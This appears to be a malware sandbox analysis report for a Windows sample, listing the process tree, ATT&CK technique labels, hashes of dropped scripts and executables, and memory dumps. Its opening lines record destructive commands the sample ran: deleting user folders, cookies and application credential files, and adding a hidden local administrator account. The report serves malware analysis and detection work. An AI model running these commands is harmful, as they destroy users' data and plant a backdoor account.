"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT
3⤵
PID:652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT
3⤵
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT
3⤵
PID:1700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT
3⤵
PID:1612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT
3⤵
PID:1924

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT
2⤵
PID:1952

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrateurs /add NTUSER
1⤵
PID:224

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe
Filesize
292B

MD5
e11a368aaa023ac803dff823cc918920

SHA1
3ddb356f147922b4b21068d9c69b9452e437a15c

SHA256
037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518

SHA512
c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe
Filesize
292B

MD5
e11a368aaa023ac803dff823cc918920

SHA1
3ddb356f147922b4b21068d9c69b9452e437a15c

SHA256
037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518

SHA512
c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\CPBA.bat
Filesize
345B

MD5
23e76ff91ef416f250a82af89a02769c

SHA1
3429cc2b37e993bab32a7840618f0c17d9a091e6

SHA256
81479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035

SHA512
ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62

Download Submit
C:\Users\Admin\AppData\Local\Temp\CPBA.bat
Filesize
345B

MD5
23e76ff91ef416f250a82af89a02769c

SHA1
3429cc2b37e993bab32a7840618f0c17d9a091e6

SHA256
81479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035

SHA512
ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdf.vbs
Filesize
327B

MD5
031c3f01fd6505397cae931dbdf3bfdb

SHA1
d20fdee4d60f60b957ccf742130ba56485eae8c6

SHA256
b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a

SHA512
d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.bat
Filesize
1KB

MD5
659ce8e39a97c207cb7b7772fac6bbbe

SHA1
482911c7f725ee815c5cf1a52ff65809be1d83ff

SHA256
620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a

SHA512
eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.bat
Filesize
1KB

MD5
45b08f10911ca031d2b3682a109d64d8

SHA1
70c69c39ee4dff16594d61e43abd0ae9cba024f4

SHA256
db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20

SHA512
1d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.vbe
Filesize
2KB

MD5
b4725c8a0d996c389273664a63759590

SHA1
219ae39177633b65c451d07fb2fe2ff739811032

SHA256
8c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce

SHA512
b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp.vbe
Filesize
2KB

MD5
b4725c8a0d996c389273664a63759590

SHA1
219ae39177633b65c451d07fb2fe2ff739811032

SHA256
8c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce

SHA512
b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tp.vbe
Filesize
175B

MD5
e6a69ddde6b0a867c0b11bcadeffdd58

SHA1
bacd51425b6c90308493389fe9e5255f6485a6b9

SHA256
eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c

SHA512
5d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946

Download Submit
C:\Users\Admin\AppData\Local\Temp\tp.vbe
Filesize
175B

MD5
e6a69ddde6b0a867c0b11bcadeffdd58

SHA1
bacd51425b6c90308493389fe9e5255f6485a6b9

SHA256
eb4ed0aff93a219c49f5622f535b70df16bdcb12d20b6e382892d9d57bfde13c

SHA512
5d16c61677bb9e7b2d244a2db0926970bd5cec8cad9142e5cc8287c5041c5bccf90aea00e606d10d45e94db9c42f79e2d7929a72e0562c7a48a3100414701946

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.bat
Filesize
1KB

MD5
e2930c13dcc510ff3e677f744c13fcf2

SHA1
d1bdcd06108a6bf848cf72181003ea587d1fbdb1

SHA256
a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e

SHA512
6a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.bat
Filesize
1KB

MD5
e2930c13dcc510ff3e677f744c13fcf2

SHA1
d1bdcd06108a6bf848cf72181003ea587d1fbdb1

SHA256
a4bd0e5e41f1ecfb8db11c8a217508d47b35f665bcf255bd6bc101838eb61f1e

SHA512
6a63a344d8f94e800c6cacf0c3927d006e3eff380a001b32abfa2e8cbab5ea923ba52748945de9b18bc84af11f7753a2c86c880dd0c885e3fbfe392e37b43721

Download Submit
C:\kernel\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Filesize
181KB

MD5
91f6b90fc19be94b62bb3ec2ff60fc30

SHA1
ed92e88998bf8ed11994291fbdcdebf7272249fa

SHA256
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b

SHA512
ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc

Download Submit
C:\system32\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Filesize
181KB

MD5
91f6b90fc19be94b62bb3ec2ff60fc30

SHA1
ed92e88998bf8ed11994291fbdcdebf7272249fa

SHA256
57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b

SHA512
ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc

Download Submit
C:\system32\SystemProtection.exe
Filesize
165KB

MD5
8886e0697b0a93c521f99099ef643450

SHA1
851bd390bf559e702b8323062dbeb251d9f2f6f7

SHA256
d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f

SHA512
fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Download Submit
C:\system32\SystemProtection.exe
Filesize
165KB

MD5
8886e0697b0a93c521f99099ef643450

SHA1
851bd390bf559e702b8323062dbeb251d9f2f6f7

SHA256
d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f

SHA512
fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Download Submit
C:\system32\bkr.bat
Filesize
568B

MD5
fc6f03cfefec6ed5e12c8de71c815751

SHA1
b35cb2e194b5167322acc4ab782f6bef76409de2

SHA256
ef8bd89fdc7a3e711849f318d97ab0693432daf34f7b83f18e894fa4d22e956f

SHA512
ba9fbfff61de7d68e8612b9364bc8cb04117727a38f6f77912b4c4895b064f83e8b33aee51e32fef945cd13c88b2e03c5a7e21910de71fe4cd8d1a0f93fd7ad3

Download Submit
C:\system32\r0k.rk
Filesize
8B

MD5
0438048db30e1b7f6ab1dc26028b9019

SHA1
da1a0594a0587908a2369708c3c6cdcc316cfbad

SHA256
59450696618a55d09cd8110b2a6191a4de8458da35f41a4112c3d408db9d6cc0

SHA512
d3106527baaca4150f934d19d4da846ea37db0378077695d4f5e1f4a7488e600467a3d22b481ebfc36b94dc95a6f195a24f041702cde301b00f455418e7e776d

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\system32\SystemProtection.exe
Filesize
165KB

MD5
8886e0697b0a93c521f99099ef643450

SHA1
851bd390bf559e702b8323062dbeb251d9f2f6f7

SHA256
d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f

SHA512
fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Download Submit
\system32\SystemProtection.exe
Filesize
165KB

MD5
8886e0697b0a93c521f99099ef643450

SHA1
851bd390bf559e702b8323062dbeb251d9f2f6f7

SHA256
d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f

SHA512
fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837

Download Submit
memory/300-247-0x0000000000000000-mapping.dmp

Download
memory/520-158-0x0000000000000000-mapping.dmp

Download
memory/592-87-0x0000000000000000-mapping.dmp

Download
memory/592-154-0x0000000000000000-mapping.dmp

Download
memory/628-157-0x0000000000000000-mapping.dmp

Download
memory/648-55-0x0000000000000000-mapping.dmp

Download
memory/756-259-0x0000000000000000-mapping.dmp

Download
memory/756-130-0x0000000000000000-mapping.dmp

Download
memory/784-152-0x0000000000000000-mapping.dmp

Download
memory/784-257-0x0000000000000000-mapping.dmp

Download
memory/932-245-0x0000000000000000-mapping.dmp

Download
memory/976-246-0x0000000000000000-mapping.dmp

Download
memory/1032-252-0x0000000000000000-mapping.dmp

Download
memory/1048-143-0x0000000000000000-mapping.dmp

Download
memory/1064-54-0x000007FEFBDB1000-0x000007FEFBDB3000-memory.dmp

Filesize
8KB

Download
memory/1064-248-0x0000000000000000-mapping.dmp

Download
memory/1072-123-0x0000000000000000-mapping.dmp

Download
memory/1096-211-0x0000000000000000-mapping.dmp

Download
memory/1096-156-0x0000000000000000-mapping.dmp

Download
memory/1100-147-0x0000000000000000-mapping.dmp

Download
memory/1144-255-0x0000000000000000-mapping.dmp

Download
memory/1144-148-0x0000000000000000-mapping.dmp

Download
memory/1144-93-0x0000000000000000-mapping.dmp

Download
memory/1160-141-0x0000000000000000-mapping.dmp

Download
memory/1160-176-0x0000000000000000-mapping.dmp

Download
memory/1184-139-0x0000000000000000-mapping.dmp

Download
memory/1240-163-0x0000000000000000-mapping.dmp

Download
memory/1372-241-0x0000000000000000-mapping.dmp

Download
memory/1376-58-0x0000000000000000-mapping.dmp

Download
memory/1452-133-0x0000000000000000-mapping.dmp

Download
memory/1464-142-0x0000000000000000-mapping.dmp

Download
memory/1488-162-0x0000000000000000-mapping.dmp

Download
memory/1492-59-0x0000000000000000-mapping.dmp

Download
memory/1520-132-0x0000000000000000-mapping.dmp

Download
memory/1544-254-0x0000000000000000-mapping.dmp

Download
memory/1564-149-0x0000000000000000-mapping.dmp

Download
memory/1572-150-0x0000000000000000-mapping.dmp

Download
memory/1572-256-0x0000000000000000-mapping.dmp

Download
memory/1576-153-0x0000000000000000-mapping.dmp

Download
memory/1576-205-0x0000000000000000-mapping.dmp

Download
memory/1584-128-0x0000000000000000-mapping.dmp

Download
memory/1584-146-0x0000000000000000-mapping.dmp

Download
memory/1588-127-0x0000000000000000-mapping.dmp

Download
memory/1588-145-0x0000000000000000-mapping.dmp

Download
memory/1632-129-0x0000000000000000-mapping.dmp

Download
memory/1632-258-0x0000000000000000-mapping.dmp

Download
memory/1648-57-0x0000000000000000-mapping.dmp

Download
memory/1676-140-0x0000000000000000-mapping.dmp

Download
memory/1676-175-0x0000000000000000-mapping.dmp

Download
memory/1700-136-0x0000000000000000-mapping.dmp

Download
memory/1748-137-0x0000000000000000-mapping.dmp

Download
memory/1752-144-0x0000000000000000-mapping.dmp

Download
memory/1752-251-0x0000000000000000-mapping.dmp

Download
memory/1760-161-0x0000000000000000-mapping.dmp

Download
memory/1920-151-0x0000000000000000-mapping.dmp

Download
memory/1924-177-0x0000000000000000-mapping.dmp

Download
memory/1936-168-0x0000000000000000-mapping.dmp

Download
memory/1952-170-0x0000000000000000-mapping.dmp

Download
memory/1988-173-0x0000000000000000-mapping.dmp

Download
memory/1988-138-0x0000000000000000-mapping.dmp

Download
memory/2000-250-0x0000000000000000-mapping.dmp

Download
memory/2004-249-0x0000000000000000-mapping.dmp

Download
memory/2012-134-0x0000000000000000-mapping.dmp

Download
memory/2024-155-0x0000000000000000-mapping.dmp

Download
memory/2028-131-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads